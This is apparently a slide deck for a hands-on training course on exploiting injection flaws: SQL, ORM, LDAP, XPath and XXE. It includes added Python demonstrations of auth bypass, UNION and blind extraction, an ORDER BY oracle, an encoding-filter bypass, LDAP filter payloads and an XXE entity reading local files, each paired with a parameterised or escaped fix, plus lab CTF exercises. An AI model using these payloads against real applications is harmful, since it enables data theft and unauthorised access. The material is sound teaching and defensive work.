Injection flaw teaser

Page 1: Injection flaw teaser

The Art Of Exploiting Injection Flaws
Sumit Siddharth, [email protected]

Page 2: Injection flaw teaser

About the course

Hands-on 2-day training
Requires out-of-the-box thinking (strong coffee recommended!)
20 exercises, 100 slides, 8 CTFs!
Previous feedback:

“This was the best course I have ever been on. Since attending the course, I have identified so many issues which automated tools have missed. Thanks a ton, Sid”

“I have been pentesting for 4 years now, and thought I knew all about SQLI. I guess I was wrong. If anyone knows this subject well, it is Sid”

Page 3: Injection flaw teaser

About Me

Sumit “sid” Siddharth
Speaker/Trainer at Black Hat, Def con, OWASP Appsec, HITB, Ruxcon etc.

My blog: www.notsosecure.com

Specialist in Application & Database Security!

More than 8 years of Pentesting!

Co-author: SQL Injection Attacks and Defense

Head of Penetration Testing @ 7Safe

Page 4: Injection flaw teaser

Day 1: SQL Injection

Page 5: Injection flaw teaser

Exploiting SQL Injections

Authentication Bypass
Extracting Data
Error Message Enabled
Error Message Disabled
Union Injection
Blind Injection
Time Delays
Out Of Band Channels
Privilege Escalation
OS code execution
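A worked example of three of the techniques listed above (authentication bypass, UNION extraction and boolean-blind extraction), added here and not part of the course material. The login and search functions, the users table and its rows are hypothetical, built on an in-memory SQLite database so the example runs without a server; the blind extraction is the general binary-search algorithm, of which the course lists one instance.

```python
import sqlite3

# Constructed sample data for the demonstration (not from the course).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "S3cret!", "dba"),
        (2, "alice", "wonderland", "user"),
    ])
    return db

def login_vulnerable(db, user, pwd):
    # Hypothetical vulnerable login: both values are pasted into the SQL text.
    sql = f"SELECT name, role FROM users WHERE name = '{user}' AND password = '{pwd}'"
    return db.execute(sql).fetchall()

def login_safe(db, user, pwd):
    # Parameterised query: the values are bound, never parsed as SQL.
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (user, pwd)).fetchall()

def search_vulnerable(db, term):
    # Second hypothetical injection point: a two-column search, which is what
    # UNION extraction needs (the injected SELECT must match the column count).
    sql = f"SELECT name, role FROM users WHERE name LIKE '%{term}%'"
    return db.execute(sql).fetchall()

def union_dump(db):
    # UNION injection: append our own SELECT and comment out the trailing quote.
    return search_vulnerable(db, "zzz' UNION SELECT name, password FROM users -- ")

def oracle(db, condition):
    # Boolean-blind oracle: all we learn is whether any row came back.
    # '%zzz' matches nothing, so the result depends only on `condition`.
    return len(search_vulnerable(db, f"zzz' OR ({condition}) -- ")) > 0

def blind_number(db, expr, upper):
    # Binary-search an integer-valued SQL expression in [0, upper] via the oracle.
    lo, hi = 0, upper
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(db, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo

def blind_extract(db, subquery):
    # Recover a string one character at a time: first its length, then each
    # code point via substr()/unicode(). About seven requests per character.
    length = blind_number(db, f"length(({subquery}))", 64)
    return "".join(
        chr(blind_number(db, f"unicode(substr(({subquery}), {i}, 1))", 127))
        for i in range(1, length + 1)
    )

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin' -- ", "wrong"))   # [('admin', 'dba')]
    print(login_safe(db, "admin' -- ", "wrong"))         # []
    print(union_dump(db))
    print(blind_extract(db, "SELECT password FROM users WHERE name = 'admin'"))  # S3cret!
```

The same oracle loop is what tools automate; with error messages enabled you would read the value from the error text instead, and with no visible difference in responses at all you fall back to time delays or an out-of-band channel, as the list above indicates.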

Page 6: Injection flaw teaser

Exercise 9.8 – SQL Injection: OS command execution

http://hacklab.net/hackme_7.5/

Objective: Exploit SQL injection to run OS commands on the database server
CTF: What are the contents of C:\secret.txt on the server?
Time: 10 mins

Page 7: Injection flaw teaser

Advanced SQL Injection

Insanely Blind SQL Injection
Application returns the same response
Injection point in an INSERT/UPDATE statement

Page 8: Injection flaw teaser

Encoding/Decoding User Input

Base64 decoding user input
Hex decoding user input
Real world examples

WordPress Admin-Ajax.php unauthenticated SQL injection

PHP-Nuke auth.php

if (!empty($_POST['cookie'])) $cookie = explode(';', urldecode($_POST['cookie']));
$admin = base64_decode($admin);   // base64-decoded user input that later reaches a query
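The pattern behind both real-world cases above is that a check runs on the encoded text and the decoded value is concatenated afterwards. Added example, not from the course: a hypothetical lookup that escapes quotes before base64 or hex decoding, beside the corrected order (decode, validate, bind). The users table and its rows are constructed for the demonstration.

```python
import base64
import binascii
import sqlite3

# Constructed user table for the demonstration (not from the course).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [("admin", "dba"), ("alice", "user")])
    return db

def escape_quotes(value):
    # The only "validation" in this hypothetical app: double single quotes.
    return value.replace("'", "''")

def decode(value, encoding):
    if encoding == "base64":
        return base64.b64decode(value, validate=True).decode()
    if encoding == "hex":
        return bytes.fromhex(value).decode()
    raise ValueError("unknown encoding")

def lookup_vulnerable(db, cookie, encoding):
    # Same ordering as the PHP-Nuke fragment: the check runs on the *encoded*
    # text, which contains no quote characters, and the decoded payload is
    # then concatenated unchecked.
    admin = escape_quotes(cookie)
    admin = decode(admin, encoding)
    sql = f"SELECT name, role FROM users WHERE name = '{admin}'"
    return db.execute(sql).fetchall()

def lookup_safe(db, cookie, encoding):
    # Decode first, reject garbage, then bind the decoded value as a parameter.
    try:
        admin = decode(cookie, encoding)
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return []
    return db.execute("SELECT name, role FROM users WHERE name = ?", (admin,)).fetchall()

def encode(payload, encoding):
    # Attacker side: wrap the payload in the encoding the application expects.
    raw = payload.encode()
    return base64.b64encode(raw).decode() if encoding == "base64" else raw.hex()

if __name__ == "__main__":
    db = make_db()
    payload = "x' OR role = 'dba' -- "
    print(lookup_vulnerable(db, encode(payload, "base64"), "base64"))  # [('admin', 'dba')]
    print(lookup_safe(db, encode(payload, "base64"), "base64"))        # []
```

The same applies to any filter placed in front of the application (a WAF that inspects the raw cookie never sees the quote either), which is why automated scanners that only send literal payloads miss these injection points.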

Page 9: Injection flaw teaser

SQL Injection in SQL Names

Consider the following:

Dim cat, orderBy, query
cat = Replace(Request.Form("cat"), "'", "''")
orderBy = Replace(Request.Form("orderBy"), "'", "''")
query = "SELECT * FROM prod WHERE cat = '" & cat & "' ORDER BY " & orderBy
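Doubling quotes protects the quoted cat literal, but orderBy is emitted as a bare SQL name, so the doubling changes nothing there and any quote-free SQL goes straight into ORDER BY. Added example, not from the course: the logic ported to Python over an in-memory SQLite database, with a sort-order oracle that leaks the admin password and the allow-list fix. The prod and users tables, their rows and the allow-list are hypothetical.

```python
import sqlite3

# Constructed catalogue and login table for the demonstration (not from the course).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE prod (id INTEGER, cat TEXT, name TEXT, price REAL)")
    db.executemany("INSERT INTO prod VALUES (?, ?, ?, ?)", [
        (1, "books", "zebra guide", 10.0),
        (2, "books", "apple guide", 30.0),
        (3, "tools", "hammer", 15.0),
    ])
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return db

def search_quote_doubling(db, cat, order_by):
    # Port of the ASP snippet: the quoted `cat` literal is protected, the
    # unquoted `order_by` identifier is not.
    cat = cat.replace("'", "''")
    order_by = order_by.replace("'", "''")
    sql = f"SELECT name FROM prod WHERE cat = '{cat}' ORDER BY {order_by}"
    return [row[0] for row in db.execute(sql)]

ALLOWED_ORDER = {"name": "name", "price": "price"}

def search_safe(db, cat, order_by):
    # Values are bound; identifiers cannot be bound, so map them through an allow-list.
    column = ALLOWED_ORDER.get(order_by)
    if column is None:
        raise ValueError("unsupported sort column")
    sql = f"SELECT name FROM prod WHERE cat = ? ORDER BY {column}"
    return [row[0] for row in db.execute(sql, (cat,))]

def order_oracle(db, condition):
    # One bit per request: rows sort by name when `condition` holds, by price
    # otherwise. `condition` must avoid quote characters, since those get doubled.
    payload = f"(CASE WHEN ({condition}) THEN name ELSE price END)"
    return search_quote_doubling(db, "books", payload) == ["apple guide", "zebra guide"]

def leak_char(db, position):
    # Recover one character of the admin password through the sort order.
    # char(97,100,109,105,110) spells 'admin' without using any quotes.
    for code in range(32, 127):
        cond = (f"(SELECT unicode(substr(password, {position}, 1)) FROM users "
                f"WHERE name = char(97,100,109,105,110)) = {code}")
        if order_oracle(db, cond):
            return chr(code)
    return None

if __name__ == "__main__":
    db = make_db()
    print(search_quote_doubling(db, "books' OR '1'='1", "name"))  # [] : doubling works for cat
    print("".join(leak_char(db, i) for i in range(1, 8)))          # S3cret! : not for ORDER BY
    print(search_safe(db, "books", "price"))
```

The allow-list maps a user-visible token to a column name you wrote yourself; quoting the identifier is a weaker alternative because it still lets the user pick any column, including ones the page should not sort on.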

Page 10: Injection flaw teaser

Hacking Oracle from Web

Exploiting SQL Injection against an Oracle database
How to extract data: one query to get them all!
How to execute OS code
What if we are not DBA? Become DBA, execute OS code, drop DBA

Page 11: Injection flaw teaser

Capture The Flag: SQL Injection

http://hacklab.net/ctf.asp?data=foobar
Objective: What's in C:\secret.txt?
Time: 20 mins! No instructions or hints this time!

Page 12: Injection flaw teaser

Day 2: The Art of Exploiting Lesser Known Injection Flaws

ORM Injection
LDAP Injection
Advanced LDAP Injection
XPath Injection
XPath v2
XML Entity Injection
Combining XPath and XXE
CTF
Q&A

Page 13: Injection flaw teaser

Hibernate Query Language Injection

User input is concatenated into the HQL string and passed straight through to the underlying SQL engine:

List<Event> result = session.createQuery("from Event e where e.title='" + param + "'").list();

Page 14: Injection flaw teaser

HACKING LDAP

LDAP overview

LDAP injection

Blind LDAP injection

Hacking LDAP in practice

Securing Applications Against LDAP Injections

Page 15: Injection flaw teaser

LDAP Injection: Authentication Bypass

(&(user=username)(password=pwd))
Usually the password is hashed and then matched against the stored value, so injection is most likely to work only in the username field.
(&(user=username)(password=*))
(&(user=username)(&))(password=pwd))
Anything after the first filter will be ignored by OpenLDAP.
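Added example, not from the course, that builds the filter above from user input, shows the two bypass payloads, and applies the RFC 4515 escaping that defeats them. The `first_complete_filter` function is an illustrative model of the truncation the slide attributes to OpenLDAP (only the first balanced expression counts), not OpenLDAP's actual parser; the attribute names `user` and `password` are the slide's.

```python
# Filter construction as the slide describes it (hypothetical application code).
def build_filter_vulnerable(username, password):
    return f"(&(user={username})(password={password}))"

# RFC 4515 escapes for the characters that carry meaning inside a filter value.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

def escape_filter_value(value):
    # Character-by-character, so a backslash is never escaped twice.
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)

def build_filter_safe(username, password):
    return (f"(&(user={escape_filter_value(username)})"
            f"(password={escape_filter_value(password)}))")

def first_complete_filter(text):
    # Model of the behaviour the slide describes: the filter actually evaluated
    # is the first balanced, parenthesised expression; trailing text is ignored.
    depth = 0
    for i, ch in enumerate(text):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return text[:i + 1]
            if depth < 0:
                break
    raise ValueError("unbalanced filter")

def effective_filter(builder, username, password):
    return first_complete_filter(builder(username, password))

if __name__ == "__main__":
    # Payload 1: close the AND and match any password with a wildcard.
    print(effective_filter(build_filter_vulnerable, "bob)(password=*))", "pw"))
    # Payload 2: (&) is the absolute-true filter, so the password term is dropped.
    print(effective_filter(build_filter_vulnerable, "bob)(&)", "pw"))
    # Escaped: the parentheses become \28 \29 and the filter stays a single term.
    print(effective_filter(build_filter_safe, "bob)(&)", "pw"))
```

With escaping applied, `bob)(&)` is searched for literally and matches no user; the password term is never detached from the AND.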

Page 16: Injection flaw teaser

Exercise 6

http://hacklab2.net:81/ldap/selfservice/PHP/LDAP
Find the telephone number of employee Eric Philip
Time: 10 mins

Page 17: Injection flaw teaser

XPATH Injection

Agenda
What is XPATH
Exploiting XPATH
Impact of XPATH exploitation
Blind XPATH Injection
Automating XPATH Injection
XPATH v2 injection
Insane XPATH Injection
Defending against XPATH Injection

Page 18: Injection flaw teaser

XPATH’s XML Nomenclature

(Diagram of an XML document labelling its parts: root node, nodes, node names and node values, attribute names and attribute values, and a comment.)

Page 19: Injection flaw teaser

Automating Xpath

XPATH Explorer
Demo time!

Page 20: Injection flaw teaser

XPath 2.0 Features

Hugely increased feature set:
Regular expressions
Unicode normalization
String to code point conversion
Remote document references
All of these can be utilised to speed up document retrieval and reduce the key space we have to search.

Page 21: Injection flaw teaser

XPATH 2.0

Allows reading not just the XML document being queried but any XML file on the file system (XPath 2.0's doc() function takes a URI).

Page 22: Injection flaw teaser

Hacking Web Services with XML External Entity

Not validating the XML before processing it
Attacker can inject an external entity: <!ENTITY pwned SYSTEM "file:///c:/boot.ini" >
The web service parses the entity and the parser accesses the local resource
Unauthorized access to information
Port scanning
Denial of service attack: breaking the XML syntax, providing files like /dev/urandom
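Added example, not from the course, of the entity above doing its work against Python's xml.sax parser: the same document is parsed once with external general entity resolution switched on (the vulnerable configuration) and once with it off, and the leaked text is compared. The target file is a constructed temporary file standing in for C:\boot.ini, and `reject_doctype` is a hypothetical pre-check for services that never need a DTD.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class _TextCollector(ContentHandler):
    """Collects character data, i.e. whatever the parser substitutes for &pwned;."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_text(xml_bytes, resolve_external_entities):
    # xml.sax leaves external general entities unresolved unless
    # feature_external_ges is switched on; a service that enables it (or uses
    # a parser that resolves them by default) is the vulnerable case.
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def reject_doctype(xml_bytes):
    # Defence in depth for a service that never needs a DTD: refuse the
    # document before it reaches the parser (the keyword is case-sensitive in XML).
    if b"<!DOCTYPE" in xml_bytes:
        raise ValueError("DOCTYPE not allowed")
    return xml_bytes


def xxe_payload(file_uri):
    # Same entity shape as the slide, pointed at an arbitrary file URI.
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [<!ENTITY pwned SYSTEM "{file_uri}">]>\n'
        "<data>&pwned;</data>"
    ).encode()


def demo():
    # Constructed target file standing in for C:\boot.ini.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("top secret")
        path = f.name
    try:
        uri = pathlib.Path(path).as_uri()
        leaked = parse_text(xxe_payload(uri), resolve_external_entities=True)
        blocked = parse_text(xxe_payload(uri), resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, blocked


if __name__ == "__main__":
    print(demo())   # ('top secret', '')
```

The entity body must itself be well-formed XML content for the parser to accept it, which is why plain text files leak cleanly while files containing `<` or `&` break the parse (the "breaking the XML syntax" case above); a file such as /dev/urandom never ends, which gives the denial-of-service variant.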

Page 23: Injection flaw teaser

Combining XXE and Xpath

Did I say, with XPath 2.0 you can read arbitrary XML files on the file system?
I actually mean: with XPath 2.0 you can read arbitrary XML files on the file system.
Introducing Xcat

Page 24: Injection flaw teaser

Thank You!

Questions? [email protected]
notsosecure